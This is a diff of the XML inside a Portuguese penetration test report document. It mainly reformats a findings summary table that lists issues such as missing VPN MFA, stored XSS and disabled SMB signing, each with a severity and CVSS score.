+              <w:t>Active Directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2307,17 +2523,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-07</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-07</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2327,17 +2544,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Ausência de MFA no acesso VPN</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Ausência de MFA no acesso VPN</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2349,17 +2567,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2369,17 +2588,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">6.5</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>6.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2389,19 +2609,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Rede</w:t>
+              <w:t>Rede</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2411,17 +2638,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-05</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-05</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2431,17 +2659,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Cross-Site Scripting armazenado em avaliações</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Cross-Site Scripting armazenado em avaliações</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2453,17 +2682,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2473,17 +2703,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">6.1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>6.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2493,19 +2724,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Aplicação Web</w:t>
+              <w:t>Aplicação Web</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2515,17 +2753,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-06</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-06</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2535,17 +2774,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">SMB signing desabilitado (NTLM relay)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>SMB signing desabilitado (NTLM relay)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2557,17 +2797,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2577,17 +2818,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">5.9</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>5.9</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2597,19 +2839,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Rede</w:t>
+              <w:t>Rede</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2619,17 +2868,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-08</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-08</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2639,17 +2889,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Cabeçalhos de segurança e configuração TLS fracos</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Cabeçalhos de segurança e configuração TLS fracos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2661,17 +2912,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2681,17 +2933,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">3.7</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>3.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2701,19 +2954,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Configuração</w:t>
+              <w:t>Configuração</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2723,17 +2983,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-09</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-09</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2743,17 +3004,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Divulgação de informação em mensagens de erro</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Divulgação de informação em mensagens de erro</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2765,17 +3027,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2785,17 +3048,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">3.1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>3.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2805,19 +3069,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Aplicação Web</w:t>
+              <w:t>Aplicação Web</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2827,17 +3098,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-10</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-10</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2847,17 +3119,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Divulgação de versões de software (banners)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Divulgação de versões de software (banners)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2869,17 +3142,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Info</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Info</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2889,17 +3163,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">0.0</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>0.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2909,7 +3184,7 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Configuração</w:t>
+              <w:t>Configuração</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2917,7 +3192,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="40" w:before="160"/>
+        <w:spacing w:before="160" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2927,15 +3202,15 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detalhamento dos achados</w:t>
+        <w:t>Detalhamento dos achados</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2955,13 +3230,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">CRÍTICO</w:t>
+        <w:t>CRÍTICO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -2971,13 +3246,13 @@
